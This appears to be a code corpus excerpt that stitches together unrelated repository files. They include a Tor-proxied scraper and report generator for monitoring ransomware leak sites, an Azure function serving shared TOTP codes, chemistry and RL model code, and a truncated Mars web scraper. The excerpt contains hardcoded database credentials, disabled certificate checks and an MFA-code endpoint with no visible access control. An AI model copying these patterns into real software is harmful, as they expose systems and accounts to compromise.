surface ri.TransformBegin() ri.AttributeBegin() ri.Attribute ("identifier", {"name": "Surface"}) ri.Attribute('displacementbound', { 'sphere' : [1], 'coordinatesystem' : ['object'] }) ri.Pattern('testShader','testShader', { }) ri.Bxdf("PxrSurface", "roll", { "reference color diffuseColor" : ["testShader:resultRGB"], }) cube_width = 5 cube_height = 5 cube_depth = 0.5 CreateCube(cube_width, cube_height, cube_depth) ri.AttributeEnd() ri.TransformEnd() ri.WorldEnd() ri.End() # End .rib ```
{ "source": "joshhighet/ransomwatch", "score": 3 }
#### File: joshhighet/ransomwatch/geckodrive.py ```python import time import requests from selenium import webdriver from selenium.webdriver.firefox.options import Options from selenium.common.exceptions import WebDriverException from sharedutils import checktcp from sharedutils import randomagent from sharedutils import sockshost, socksport from sharedutils import stdlog, dbglog, errlog, honk requests.packages.urllib3.disable_warnings() def main(webpage): ''' main function to fetch webpages with javascript rendering supporting onion routing ''' stdlog('geckodriver: ' + 'starting to fetch ' + webpage) dbglog('geckodriver: ' + 'configuring options, user agent & cert preacceptance') options = Options() options.headless = True options.set_preference('dom.max_script_run_time', 15) options.add_argument("start-maximized") options.accept_untrusted_certs = True options.set_preference('network.http.timeout', 20000) options.set_preference("general.useragent.override", randomagent()) if '.onion' in webpage: stdlog('geckodriver: ' + 'appears we are dealing with an onionsite') if not checktcp(sockshost, socksport): honk('geckodriver: ' + 'socks proxy not available and required for onionsites!') else: stdlog( 'geckodriver: ' + 'assumed torsocks proxy found - tcp://' \ + sockshost + ':' + str(socksport) ) stdlog('geckodriver: ' + 'configuring proxy settings') options.set_preference('network.proxy.type', 1) options.set_preference('network.proxy.socks', sockshost) options.set_preference('network.proxy.socks_port', int(socksport)) options.set_preference("network.proxy.socks_remote_dns", True) try: stdlog('geckodriver: ' + 'starting webdriver') driver = webdriver.Firefox(options=options) stdlog('geckodriver: ' + 'fetching webpage') driver.get(webpage) # set the number of seconds to wait before working with the DOM sleeptz = 5 stdlog('geckodriver: ' + 'waiting ' + str(sleeptz) + ' seconds to render elements') time.sleep(sleeptz) #if 'lockbitapt' in webpage: # stdlog('geckodriver: ' + 'special detected, waiting for captcha') # driver.add_cookie({"name": "ddosproteck", "value": "lol"}) # driver.find_element_by_css_selector('button').click() ''' get html from dom after js processing and page rendering complete ''' source = driver.execute_script("return document.getElementsByTagName('html')[0].innerHTML") stdlog('geckodriver: ' + 'fetched') except WebDriverException as e: # if e contains neterror?e=dnsNotFound, then we are dealing with an onion site failing hsdir if 'about:neterror?e=dnsNotFound' in str(e): errlog('geckodriver: ' + 'socks request unable to route to host, check hsdir resolution status!') elif 'about:neterror?e=netTimeout' in str(e): errlog('geckodriver: ' + 'geckodriver socks request timed out!') else: errlog('geckodriver: ' + 'error: ' + str(e)) driver.quit() stdlog('geckodriver: ' + 'webdriver quit') return None if driver: driver.quit() stdlog('geckodriver: ' + 'webdriver quit') return source ``` #### File: joshhighet/ransomwatch/markdown.py ```python import os import time from datetime import datetime as dt from sharedutils import gcount from sharedutils import openjson from sharedutils import postcount from sharedutils import hostcount from sharedutils import groupcount from sharedutils import postssince from sharedutils import parsercount from sharedutils import onlinecount from sharedutils import postslast24h from sharedutils import version2count from sharedutils import poststhisyear from sharedutils import currentmonthstr from sharedutils import mounthlypostcount #from sharedutils import headlesscount #from sharedutils import countcaptchahosts from sharedutils import stdlog, dbglog, errlog, honk from plotting import trend_posts_per_day, plot_posts_by_group, pie_posts_by_group def suffix(d): return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th') def custom_strftime(fmt, t): return t.strftime(fmt).replace('{S}', str(t.day) + suffix(t.day)) friendly_tz = custom_strftime('%B {S}, %Y', dt.now()).lower() def writeline(file, line): '''write line to file''' with open(file, 'a') as f: f.write(line + '\n') f.close() def groupreport(): ''' create a list with number of posts per unique group ''' stdlog('generating group report') posts = openjson('posts.json') # count the number of posts by group_name within posts.json group_counts = gcount(posts) # sort the group_counts - descending sorted_group_counts = sorted(group_counts.items(), key=lambda x: x[1], reverse=True) stdlog('group report generated with %d groups' % len(sorted_group_counts)) return sorted_group_counts def mainpage(): ''' main markdown report generator - used with github pages ''' stdlog('generating main page') uptime_sheet = 'docs/README.md' with open(uptime_sheet, 'w') as f: f.close() writeline(uptime_sheet, '') writeline(uptime_sheet, '## summary') writeline(uptime_sheet, '_' + friendly_tz + '_') writeline(uptime_sheet, '') writeline(uptime_sheet, 'currently tracking `' + str(groupcount()) + '` groups across `' + str(hostcount()) + '` relays & mirrors - _`' + str(onlinecount()) + '` currently online_') writeline(uptime_sheet, '') writeline(uptime_sheet, '⏲ there have been `' + str(postslast24h()) + '` posts within the `last 24 hours`') writeline(uptime_sheet, '') writeline(uptime_sheet, '🦈 there have been `' + str(mounthlypostcount()) + '` posts within the `month of ' + currentmonthstr() + '`') writeline(uptime_sheet, '') writeline(uptime_sheet, '🪐 there have been `' + str(postssince(90)) + '` posts within the `last 90 days`') writeline(uptime_sheet, '') writeline(uptime_sheet, '🏚 there have been `' + str(poststhisyear()) + '` posts within the `year of ' + str(dt.now().year) + '`') writeline(uptime_sheet, '') writeline(uptime_sheet, '🦕 there have been `' + str(postcount()) + '` posts `since the dawn of ransomwatch`') writeline(uptime_sheet, '') writeline(uptime_sheet, 'there are `' + str(parsercount()) + '` custom parsers indexing posts') #writeline(uptime_sheet, 'there are `' + str(parsercount()) + '` active parsers, `' + str(headlesscount()) + '` of which using headless browsers - _`' + str(countcaptchahosts()) + '` groups have recently introduced captchas_') writeline(uptime_sheet, '') writeline(uptime_sheet, '_`' + str(version2count()) + '` sites using v2 onion services are no longer indexed - [support.torproject.org](https://support.torproject.org/onionservices/v2-deprecation/)_') writeline(uptime_sheet, '') writeline(uptime_sheet, '> see the project [README](https://github.com/thetanz/ransomwatch#ransomwatch--) for backend technicals') def indexpage(): index_sheet = 'docs/INDEX.md' with open(index_sheet, 'w') as f: f.close() groups = openjson('groups.json') writeline(index_sheet, '# 📚 index') writeline(index_sheet, '') header = '| group | title | status | last seen | location |' writeline(index_sheet, header) writeline(index_sheet, '|---|---|---|---|---|') for group in groups: stdlog('generating group report for ' + group['name']) for host in group['locations']: stdlog('generating host report for ' + host['fqdn']) if host['available'] is True: #statusemoji = '⬆️ 🟢' statusemoji = '🟢' lastseen = '' elif host['available'] is False: # iso timestamp converted to yyyy/mm/dd lastseen = host['lastscrape'].split(' ')[0] #statusemoji = '⬇️ 🔴' statusemoji = '🔴' if host['title'] is not None: title = host['title'].replace('|', '-') else: title = '' line = '| [' + group['name'] + '](https://ransomwatch.telemetry.ltd/#/profiles?id=' + group['name'] + ') | ' + title + ' | ' + statusemoji + ' | ' + lastseen + ' | ' + host['fqdn'] + ' |' writeline(index_sheet, line) def sidebar(): ''' create a sidebar markdown report ''' stdlog('generating sidebar') sidebar = 'docs/_sidebar.md' # delete contents of file with open(sidebar, 'w') as f: f.close() writeline(sidebar, '- [home](README.md)') writeline(sidebar, '- [group index](INDEX.md)') writeline(sidebar, '- [recent posts](recentposts.md)') writeline(sidebar, '- [stats & graphs](stats.md)') writeline(sidebar, '- [group profiles](profiles.md)') stdlog('sidebar generated') def statspage(): ''' create a stats page in markdown containing the matplotlib graphs ''' stdlog('generating stats page') statspage = 'docs/stats.md' # delete contents of file with open(statspage, 'w') as f: f.close() writeline(statspage, '# 📊 stats') writeline(statspage, '') writeline(statspage, '_timestamp association commenced october 21"_') writeline(statspage, '') writeline(statspage, '![](graphs/postsbyday.png)') writeline(statspage, '') writeline(statspage, '![](graphs/postsbygroup.png)') writeline(statspage, '') writeline(statspage, '![](graphs/grouppie.png)') stdlog('stats page generated') def recentposts(top): ''' create a list the last X posts (most recent) ''' stdlog('finding recent posts') posts = openjson('posts.json') # sort the posts by timestamp - descending sorted_posts = sorted(posts, key=lambda x: x['discovered'], reverse=True) # create a list of the last X posts recentposts = [] for post in sorted_posts: recentposts.append(post) if len(recentposts) == top: break stdlog('recent posts generated') return recentposts def recentpage(): '''create a markdown table for the last 100 posts based on the discovered value''' fetching_count = 100 stdlog('generating recent posts page') recentpage = 'docs/recentposts.md' # delete contents of file with open(recentpage, 'w') as f: f.close() writeline(recentpage, '# 📰 recent posts') writeline(recentpage, '') writeline(recentpage, '_last `' + str(fetching_count) + '` posts_') writeline(recentpage, '') writeline(recentpage, '| date | title | group |') writeline(recentpage, '|---|---|---|') # fetch the 100 most revent posts and add to ascending markdown table for post in recentposts(fetching_count): # show friendly date for discovered date = post['discovered'].split(' ')[0] # replace markdown tampering characters title = post['post_title'].replace('|', '-') group = post['group_name'].replace('|', '-') grouplink = '[' + group + '](https://ransomwatch.telemetry.ltd/#/profiles?id=' + group + ')' line = '| ' + date + ' | `' + title + '` | ' + grouplink + ' |' writeline(recentpage, line) stdlog('recent posts page generated') def profilepage(): ''' create a profile page for each group in their unique markdown files within docs/profiles ''' stdlog('generating profile pages') profilepage = 'docs/profiles.md' # delete contents of file with open(profilepage, 'w') as f: f.close() writeline(profilepage, '# 🐦 profiles') writeline(profilepage, '') groups = openjson('groups.json') for group in groups: writeline(profilepage, '## ' + group['name']) writeline(profilepage, '') if group['captcha'] is True: writeline(profilepage, ':warning: _has a captcha_') writeline(profilepage, '') if group['parser'] is True: writeline(profilepage, '_parsing : `enabled`_') writeline(profilepage, '') else: writeline(profilepage, '_parsing : `disabled`_') writeline(profilepage, '') # add notes if present if group['meta'] is not None: writeline(profilepage, '_`' + group['meta'] + '`_') writeline(profilepage, '') if group['javascript_render'] is True: writeline(profilepage, '> fetching this site requires a headless browser for javascript processing') writeline(profilepage, '') if group['geckodriver'] is True: writeline(profilepage, '> fetching this site uses geckodriver/selenium') writeline(profilepage, '') if group['profile'] is not None: for profile in group['profile']: writeline(profilepage, '- ' + profile) writeline(profilepage, '') writeline(profilepage, '| title | available | version | last visit | fqdn') writeline(profilepage, '|---|---|---|---|---|') for host in group['locations']: # convert date to ddmmyyyy hh:mm date = host['lastscrape'].split(' ')[0] date = date.split('-') date = date[2] + '/' + date[1] + '/' + date[0] time = host['lastscrape'].split(' ')[1] time = time.split(':') time = time[0] + ':' + time[1] if host['title'] is not None: line = '| ' + host['title'].replace('|', '-') + ' | ' + str(host['available']) + ' | ' + str(host['version']) + ' | ' + time + ' ' + date + ' | `' + host['fqdn'] + '` |' writeline(profilepage, line) else: line = '| none | ' + str(host['available']) + ' | ' + str(host['version']) + ' | ' + time + ' ' + date + ' | `' + host['fqdn'] + '` |' writeline(profilepage, line) writeline(profilepage, '') writeline(profilepage, '| post | date |') writeline(profilepage, '|---|---|') posts = openjson('posts.json') for post in posts: if post['group_name'] == group['name']: date = post['discovered'].split(' ')[0] date = date.split('-') date = date[2] + '/' + date[1] + '/' + date[0] line = '| ' + '`' + post['post_title'].replace('|', '') + '`' + ' | ' + date + ' |' writeline(profilepage, line) writeline(profilepage, '') stdlog('profile page for ' + group['name'] + ' generated') stdlog('profile page generation complete') def main(): stdlog('generating doco') mainpage() indexpage() sidebar() recentpage() statspage() profilepage() # if posts.json has been modified within the last 45 mins, assume new posts discovered and recreate graphs if os.path.getmtime('posts.json') > (time.time() - (45 * 60)): stdlog('posts.json has been modified within the last 45 mins, assuming new posts discovered and recreating graphs') trend_posts_per_day() plot_posts_by_group() pie_posts_by_group() else: stdlog('posts.json has not been modified within the last 45 mins, assuming no new posts discovered') ```
{ "source": "joshhighet/sharedmfa", "score": 2 }
#### File: sharedmfa/get-mfa-code/__init__.py ```python import os import json import logging import datetime import urllib.parse as urlparse from urllib.parse import parse_qs import azure.functions as func import pyotp from azure.keyvault.secrets import SecretClient from azure.identity import DefaultAzureCredential from azure.cosmosdb.table.tableservice import TableService from azure.cosmosdb.table.models import Entity #fetch keyvault name from environment variable (function configuration setting) kvname = os.environ["KEY_VAULT_NAME"] kvfqdn = f"https://{kvname}.vault.azure.net" kv = SecretClient(vault_url=kvfqdn, credential=DefaultAzureCredential()) #using the AzWebJobs environment variable, connect to azure table storage stor_acc_conn_string = os.environ['AzureWebJobsStorage'] tables = TableService(connection_string=stor_acc_conn_string) def main(req: func.HttpRequest) -> func.HttpResponse: """fetch uuid from inbound url query parameter""" uuid = req.params.get('uuid') if not uuid: try: req_body = req.get_json() except ValueError: pass else: uuid = req_body.get('uuid') #if the uuid has been identified if uuid: #get otp secret object from key vault by reference to uuid otpauthkv = kv.get_secret(uuid) #get otp secret value from object totpseed = otpauthkv.value #calculate pin from otp secret otpgen = pyotp.TOTP(totpseed) totp = otpgen.now() #calculate time-to-live of pin (30 second lifespan) seconds_left = otpgen.interval - datetime.datetime.now().timestamp() % otpgen.interval miliseconds_left = seconds_left * 1000 #form json response and respond data = {} data['otp'] = totp data['expires'] = miliseconds_left json_data = json.dumps(data) return func.HttpResponse(json_data) else: return func.HttpResponse( "no uuid recieved.", status_code=400 ) ```
{ "source": "joshhills/dissertation-project", "score": 3 }
#### File: source/shared/database.py ```python from couchbase.cluster import Cluster from couchbase.cluster import PasswordAuthenticator class Database: def store_job_state(self, product_id): """ Log that scraping for a product has begun. :param product_id: """ raise NotImplementedError("Class %s doesn't implement from_json()" % self.__class__.__name__) class Couchbase(Database): def __init__(self): # Define connection parameters. authenticator = PasswordAuthenticator('root', 'administrator') self.cluster = Cluster('couchbase://localhost') self.cluster.authenticate(authenticator=authenticator) def store_job_state(self, product_id): cluster = self.cluster.open_bucket('job') # Learn how to do things with this. return ```
{ "source": "joshhochuli/OpenChem", "score": 2 }
#### File: openchem/layers/stack_augmentation.py ```python import torch import torch.nn as nn import torch.nn.functional as F class StackAugmentation(nn.Module): def __init__(self, stack_width, stack_depth, in_features, use_cuda): super(StackAugmentation, self).__init__() self.use_cuda = use_cuda self.stack_width = stack_width self.stack_depth = stack_depth self.in_features = in_features self.stack_controls_layer = nn.Linear(in_features=in_features, out_features=3) self.stack_input_layer = nn.Linear(in_features=in_features, out_features=self.stack_width) def forward(self, input_val, prev_stack): batch_size = prev_stack.size(0) controls = self.stack_controls_layer(input_val.squeeze(0)) controls = F.softmax(controls, dim=1) controls = controls.view(-1, 3, 1, 1) stack_input = self.stack_input_layer(input_val) stack_input = F.tanh(stack_input) stack_input = stack_input.permute(1, 0, 2) zeros_at_the_bottom = torch.zeros(batch_size, 1, self.stack_width) if self.use_cuda: zeros_at_the_bottom = torch.tensor(zeros_at_the_bottom.cuda(), requires_grad=True) else: zeros_at_the_bottom = torch.tensor(zeros_at_the_bottom, requires_grad=True) a_push, a_pop, a_no_op = controls[:, 0], controls[:, 1], controls[:, 2] stack_down = torch.cat((prev_stack[:, 1:], zeros_at_the_bottom), dim=1) stack_up = torch.cat((stack_input, prev_stack[:, :-1]), dim=1) new_stack = a_no_op * prev_stack + a_push * stack_up + \ a_pop * stack_down return new_stack def init_stack(self, batch_size): result = torch.zeros(batch_size, self.stack_depth, self.stack_width) if self.use_cuda: return torch.tensor(result.cuda(), requires_grad=True) else: return torch.tensor(result, requires_grad=True) ``` #### File: openchem/models/GenerativeRNN.py ```python from openchem.models.openchem_model import OpenChemModel from openchem.layers.stack_augmentation import StackAugmentation from openchem.data.utils import seq2tensor, cut_padding import torch import numpy as np class GenerativeRNN(OpenChemModel): def __init__(self, params): super(GenerativeRNN, self).__init__(params) self.has_stack = params['has_stack'] if self.has_stack: self.Stack = StackAugmentation(use_cuda=self.use_cuda, **self.params['stack_params']) self.embedding = self.params['embedding'] self.embed_params = self.params['embedding_params'] self.Embedding = self.embedding(self.embed_params) self.encoder = self.params['encoder'] self.encoder_params = self.params['encoder_params'] self.Encoder = self.encoder(self.encoder_params, self.use_cuda) self.mlp = self.params['mlp'] self.mlp_params = self.params['mlp_params'] self.MLP = self.mlp(self.mlp_params) def forward(self, inp_seq, eval=False): """Generator forward function.""" if eval: self.eval() else: self.train() batch_size = inp_seq.size()[0] seq_len = inp_seq.size()[1] n_classes = self.MLP.hidden_size[-1] result = torch.zeros(batch_size, seq_len, n_classes, requires_grad=True) if self.use_cuda: result = result.cuda() hidden = self.Encoder.init_hidden(batch_size) if self.has_stack: stack = self.Stack.init_stack(batch_size) for c in range(seq_len): inp_token = self.Embedding(inp_seq[:, c].view(batch_size, -1)) if self.has_stack: stack = self.Stack(hidden, stack) stack_top = stack[:, 0, :].unsqueeze(1) inp_token = torch.cat((inp_token, stack_top), dim=2) output, hidden = self.Encoder(inp_token, hidden) result[:, c, :] = self.MLP(output) return result.view(-1, n_classes) def infer(self, prime_str, n_to_generate, max_len, tokens, temperature=0.8): self.eval() tokens = np.array(tokens).reshape(-1) prime_str = [prime_str] * n_to_generate tokens = list(tokens[0]) num_tokens = len(tokens) prime_input = seq2tensor(prime_str, tokens) tokens = np.array(tokens) batch_size = prime_input.shape[0] seq_len = prime_input.shape[1] - 1 hidden = self.Encoder.init_hidden(batch_size) prime_input = torch.tensor(prime_input).long() if self.use_cuda: prime_input = prime_input.cuda() if self.has_stack: stack = self.Stack.init_stack(batch_size) for c in range(seq_len): inp_token = self.Embedding(prime_input[:, c].view(batch_size, -1)) if self.has_stack: stack = self.Stack(hidden, stack) stack_top = stack[:, 0, :].unsqueeze(1) inp_token = torch.cat((inp_token, stack_top), dim=2) output, hidden = self.Encoder(inp_token, hidden) inp = prime_input[:, -1] predicted = [' '] * (batch_size * (max_len - seq_len)) predicted = np.reshape(predicted, (batch_size, max_len - seq_len)) for c in range(max_len - seq_len): inp_token = self.Embedding(inp.view(batch_size, -1)) if self.has_stack: stack = self.Stack(hidden, stack) stack_top = stack[:, 0, :].unsqueeze(1) inp_token = torch.cat((inp_token, stack_top), dim=2) output, hidden = self.Encoder(inp_token, hidden) output = self.MLP(output) output_dist = output.data.view(-1).div(temperature).exp() output_dist = output_dist.view(batch_size, num_tokens) top_i = torch.multinomial(output_dist, 1) # Add predicted character to string and use as next input predicted_char = tokens[top_i] predicted[:, c] = predicted_char[:, 0] inp = torch.tensor(top_i) return predicted def cast_inputs(self, sample): sample_seq = sample['tokenized_smiles'] lengths = sample['length'] max_len = lengths.max(dim=0)[0].cpu().numpy() batch_size = len(lengths) sample_seq = cut_padding(sample_seq, lengths, padding='right') target = sample_seq[:, 1:].contiguous().view( (batch_size * (max_len - 1), 1)) seq = sample_seq[:, :-1] seq = torch.tensor(seq, requires_grad=True).long() target = torch.tensor(target).long() seq = seq.cuda() target = target.cuda() return seq, target.squeeze(1) ``` #### File: openchem/models/MoleculeProtein2Label.py ```python from openchem.models.openchem_model import OpenChemModel from openchem.optimizer.openchem_optimizer import OpenChemOptimizer from openchem.optimizer.openchem_lr_scheduler import OpenChemLRScheduler from openchem.data.utils import cut_padding import torch class MoleculeProtein2Label(OpenChemModel): r""" Creates a model that predicts one or multiple labels given two sequences as input. Embeddings for each input are extracted separately with Embedding layer, followed by encoder (could be RNN or CNN encoder) and then merged together. Last layer of the model is multi-layer perceptron. Args: params (dict): dictionary describing model architecture. """ def __init__(self, params): super(MoleculeProtein2Label, self).__init__(params) self.mol_embedding = self.params['mol_embedding'] self.mol_embed_params = self.params['mol_embedding_params'] self.prot_embedding = self.params['prot_embedding'] self.prot_embed_params = self.params['prot_embedding_params'] self.MolEmbedding = self.mol_embedding(self.mol_embed_params) self.ProtEmbedding = self.prot_embedding(self.prot_embed_params) self.mol_encoder = self.params['mol_encoder'] self.mol_encoder_params = self.params['mol_encoder_params'] self.prot_encoder = self.params['prot_encoder'] self.prot_encoder_params = self.params['prot_encoder_params'] self.MolEncoder = self.mol_encoder(self.mol_encoder_params, self.use_cuda) self.ProtEncoder = self.prot_encoder(self.prot_encoder_params, self.use_cuda) self.merge = self.params['merge'] self.mlp = self.params['mlp'] self.mlp_params = self.params['mlp_params'] self.MLP = self.mlp(self.mlp_params) def forward(self, inp, eval=False): if eval: self.eval() else: self.train() mol = inp[0] prot = inp[1] mol_embedded = self.MolEmbedding(mol) mol_output, _ = self.MolEncoder(mol_embedded) prot_embedded = self.ProtEmbedding(prot) prot_output, _ = self.ProtEncoder(prot_embedded) if self.merge == 'mul': output = mol_output*prot_output elif self.merge == 'concat': output = torch.cat((mol_output, prot_output), 1) else: raise ValueError('Invalid value for merge') output = self.MLP(output) return output def cast_inputs(self, sample): batch_mols = cut_padding(sample['tokenized_smiles'], sample['mol_length'], padding='left') batch_prots = cut_padding(sample['tokenized_protein'], sample['prot_length'], padding='left') batch_mols = torch.tensor(batch_mols, requires_grad=True).long() batch_prots = torch.tensor(batch_prots, requires_grad=True).long() batch_labels = torch.tensor(sample['labels']) if self.task == 'classification': batch_labels = batch_labels.long() elif self.task == 'regression': batch_labels = batch_labels.float() if self.use_cuda: batch_mols = batch_mols.cuda() batch_prots = batch_prots.cuda() batch_labels = batch_labels.cuda() return (batch_mols, batch_prots), batch_labels ```
{ "source": "joshholla/neuro_noodle", "score": 3 }
#### File: joshholla/neuro_noodle/model.py ```python import torch from torch import nn from torch.nn import functional as F use_cuda = torch.cuda.is_available() # ---------------------------------------------------------------------------------- # BUILDING OUR NEURAL NETWORK # ---------------------------------------------------------------------------------- class Autoencoder(torch.nn.Module): # The AutoEncoder Model # ------------------------------------------------------------------------------ def __init__(self): super(Autoencoder,self).__init__() self.encoder = nn.Sequential( nn.Linear(506 * 650, 256), nn.ReLU(inplace=True), nn.Linear(256, 40), # check if it is 256, or something else nn.ReLU(inplace=True) ) self.decoder = nn.Sequential( nn.Linear(40, 256), nn.ReLU(inplace=True), nn.Linear(256, 506 * 650), nn.ReLU(inplace=True) ) def forward(self, x): x = self.encoder(x) return self.decoder(x) # For usage after training is done # ------------------------------------------------------------------------------ def encode(self, x): # Generate latent representation of the input image x = self.encoder(x) return x def decode(self, x): # Generate image from the decoder. x = self.decoder(x) return x def get_model(): # Returns the model and optimizer model = Autoencoder() optimizer = torch.optim.Adam(model.parameters(), lr=0.001) return model, optimizer ```
{ "source": "joshholla/neuroRL", "score": 3 }
#### File: neuroRL/envs/empty.py ```python from gym_minigrid.minigrid import * from gym_minigrid.register import register class EmptyEnv(MiniGridEnv): """ Empty grid environment, no obstacles, sparse reward """ def __init__( self, size=8, agent_start_pos=(1,1), agent_start_dir=0, ): self.agent_start_pos = agent_start_pos self.agent_start_dir = agent_start_dir super().__init__( grid_size=size, max_steps=4*size*size, # Set this to True for maximum speed see_through_walls=True ) def _gen_grid(self, width, height): # Create an empty grid self.grid = Grid(width, height) # Generate the surrounding walls self.grid.wall_rect(0, 0, width, height) # Place a goal square in the bottom-right corner self.put_obj(Goal(), width - 2, height - 2) # Place the agent if self.agent_start_pos is not None: self.agent_pos = self.agent_start_pos self.agent_dir = self.agent_start_dir else: self.place_agent() # tryingn to align the initial directions. self.agent_dir = self.agent_start_dir self.mission = "get to the green goal square" class EmptyRandomEnv10x10(EmptyEnv): def __init__(self): super().__init__(size=10, agent_start_pos=None) class EmptyEnv10x10(EmptyEnv): def __init__(self): super().__init__(size=10) register( id='MiniGrid-Empty-Random-10x10-v0', entry_point='neuroRL.envs:EmptyRandomEnv10x10' ) register( id='MiniGrid-Empty-10x10-v0', entry_point='neuroRL.envs:EmptyEnv10x10' ) ```
{ "source": "joshholla/prob_mbrl", "score": 3 }
#### File: prob_mbrl/models/activations.py ```python import torch class Swish(torch.nn.Module): def forward(self, x): return x*x.sigmoid() class Sin(torch.nn.Module): def forward(self, x): return x.sin() class SinLU(torch.nn.Module): def __init__(self): super(SinLU, self).__init__() self.thr = torch.nn.Threshold(0, 0) def forward(self, x): return self.thr(x) - self.thr(-x).sin() ``` #### File: prob_mbrl/utils/core.py ```python import numpy as np import torch import os import warnings from collections import Iterable from itertools import chain from matplotlib import pyplot as plt from .rollout import rollout def plot_sample(data, axarr, colors=None, **kwargs): H, D = data.shape plots = [] if colors is None: colors = ['steelblue'] * D N = len(colors) for d in range(D): pl, = axarr[d].plot(np.arange(H), data[:, d], color=colors[d % N], **kwargs) plots.append(pl) return plots def plot_mean_var(data, axarr, colors=None, stdevs=2, **kwargs): N, H, D = data.shape plots = [] mean = data.mean(0) std = data.std(0) t = np.arange(H) if colors is None: colors = ['steelblue'] * D N = len(colors) for d in range(D): pl, = axarr[d].plot(t, mean[:, d], color=colors[d % N], **kwargs) alpha = kwargs.get('alpha', 0.5) for i in range(1, stdevs + 1): alpha = alpha * 0.8 lower_bound = mean[:, d] - i * std[:, d] upper_bound = mean[:, d] + i * std[:, d] axarr[d].fill_between(t, lower_bound, upper_bound, alpha=alpha, color=pl.get_color()) plots.append(pl) return plots def plot_trajectories( states, actions, rewards, names=['Rolled out States', 'Predicted Actions', 'Predicted Rewards'], timeout=0.5, plot_samples=True): for name in names: fig = plt.figure(name) fig.clear() fig1, axarr1 = plt.subplots(states.shape[-1], num=names[0], sharex=True, figsize=(16, 9)) fig2, axarr2 = plt.subplots(actions.shape[-1], num=names[1], sharex=True, figsize=(16, 3)) fig3, axarr3 = plt.subplots(rewards.shape[-1], num=names[2], sharex=True, figsize=(16, 3)) axarr1 = [axarr1] if not isinstance(axarr1, Iterable) else axarr1 axarr2 = [axarr2] if not isinstance(axarr2, Iterable) else axarr2 axarr3 = [axarr3] if not isinstance(axarr3, Iterable) else axarr3 if plot_samples: c1 = c2 = c3 = None for i, (st, ac, rw) in enumerate(zip(states, actions, rewards)): r1 = plot_sample(st, axarr1, c1, alpha=0.3) r2 = plot_sample(ac, axarr2, c2, alpha=0.3) r3 = plot_sample(rw, axarr3, c3, alpha=0.3) c1 = [r.get_color() for r in r1] c2 = [r.get_color() for r in r2] c3 = [r.get_color() for r in r3] else: plot_mean_var(states, axarr1) plot_mean_var(actions, axarr2) plot_mean_var(rewards, axarr3) for ax in chain(axarr1, axarr2, axarr3): ax.figure.canvas.draw() if timeout > 0: plt.show(block=False) plt.waitforbuttonpress(timeout) else: plt.show() def plot_rollout(x0, forward, pol, steps): trajs = rollout(x0, forward, pol, steps, resample_model=False, resample_policy=False, resample_particles=False) states, actions, rewards = (torch.stack(x).transpose( 0, 1).detach().cpu().numpy() for x in trajs[:3]) plot_trajectories(states, actions, rewards) def jacobian(y, x, **kwargs): """Evaluates the jacobian of y w.r.t x safely. Args: y (Tensor<m>): Tensor to differentiate. x (Tensor<n>): Tensor to differentiate with respect to. **kwargs: Additional key-word arguments to pass to `grad()`. Returns: Jacobian (Tensor<m, n>). """ J = [torch.autograd.grad(y[i], x, **kwargs)[0] for i in range(y.shape[0])] J = torch.stack(J) J.requires_grad_() return J def batch_jacobian(f, x, out_dims=None): if out_dims is None: y = f(x) out_dims = y.shape[-1] x_rep = x.repeat(out_dims, 1) x_rep = torch.tensor(x_rep, requires_grad=True) y_rep = f(x_rep) dydx = torch.autograd.grad(y_rep, x_rep, torch.eye(x.shape[-1]), allow_unused=True, retain_graph=True) return dydx def polyak_averaging(current, target, tau=0.005): for param, target_param in zip(current.parameters(), target.parameters()): target_param.data.copy_(tau * param.data + (1 - tau) * target_param.data) def perturb_initial_action(i, states, actions): if i == 0: actions = actions + 1e-1 * (torch.randint(0, 2, actions.shape[0:], device=actions.device, dtype=actions.dtype) * actions.std(0)).detach() return states, actions def threshold_linear(x, y0, yend, x0, xend): y = (x - x0) * (yend - y0) / (xend - x0) + y0 return np.maximum(y0, np.minimum(yend, y)).astype(np.int32) def sin_squashing_fn(x): ''' Periodic squashing function from PILCO. Bounds the output to be between -1 and 1 ''' xx = torch.stack([x, 3 * x]).sin() scale = torch.tensor([9.0, 1.0], device=x.device, dtype=x.dtype)[[None] * x.dim()].transpose(0, -1) return 0.125 * (xx * scale).sum(0) def load_checkpoint(path, dyn, pol, exp, val=None): msg = "Unable to load dynamics model parameters at {}" try: dyn_params = torch.load(os.path.join(path, 'latest_dynamics.pth.tar')) dyn.load(dyn_params) except Exception: warnings.warn(msg.format(path, "latest_dynamics.pth.tar")) try: pol_params = torch.load(os.path.join(path, 'latest_policy.pth.tar')) pol.load(pol_params) except Exception: warnings.warn(msg.format(path, "latest_policy.pth.tar")) if val is not None: try: val_path = os.path.join(path, 'latest_critic.pth.tar') val_params = torch.load(val_path) val.load(val_params) except Exception: warnings.warn(msg.format(val_path)) try: exp_path = os.path.join(path, 'experience.pth.tar') exp.load(exp_path) except Exception: warnings.warn(msg.format(exp_path)) ```
{ "source": "joshhopkins3/web-scraping-challenge", "score": 3 }
#### File: web-scraping-challenge/Missions_to_Mars/scrape_mars.py ```python from splinter import Browser, browser from bs4 import BeautifulSoup as bs import pandas as pd def init_browser(): executable_path = {'executable_path': "/Users/joshhopkins/.wdm/drivers/chromedriver/mac64/91.0.4472.101/chromedriver"} browser = Browser("chrome", **executable_path, headless=False) def scrape(): browser = init_browser() # --- Visit Mars News site --- browser.visit('https://mars.nasa.gov/news/') # Scrape page into Soup html = browser.html soup = bs(html, "html.parser") # Get the first news title titles = soup.find_all('div', class_='content_title') news_title = titles[0].text # Get the corresponding paragraph text paragraphs = soup.find_all('div', class_='article_teaser_body') news_paragraph= paragraphs[0].text # --- Visit JPL site for featured Mars image --- browser.visit('hhttps://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html') # Scrape page into Soup html = browser.html soup = bs(html, 'html.parser') # Search for image source img = soup.find_all('img', class_='headerimage fade-in') source = soup.find('img', class_='headerimage fade-in').get('src') url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/' feat_url = url + source # --- Use Pandas to scrape data --- tables = pd.read_html('https://space-facts.com/mars/') # Take second table for Mars facts mars_df = tables[1] # Convert table to html mars_facts = [mars_df.to_html(classes='data table table-borderless', index=False, header=False, border=0)] # --- Visit USGS Astrogeology Site --- browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars') # Search for Hemisphere titles html = browser.html soup = bs(html, 'html.parser') hemispheres = [] # Search for the names of all four hemispheres results = soup.find_all('div', class_="collapsible results") hemi_names = results[0].find_all('h3') # Get text and store in list for name in 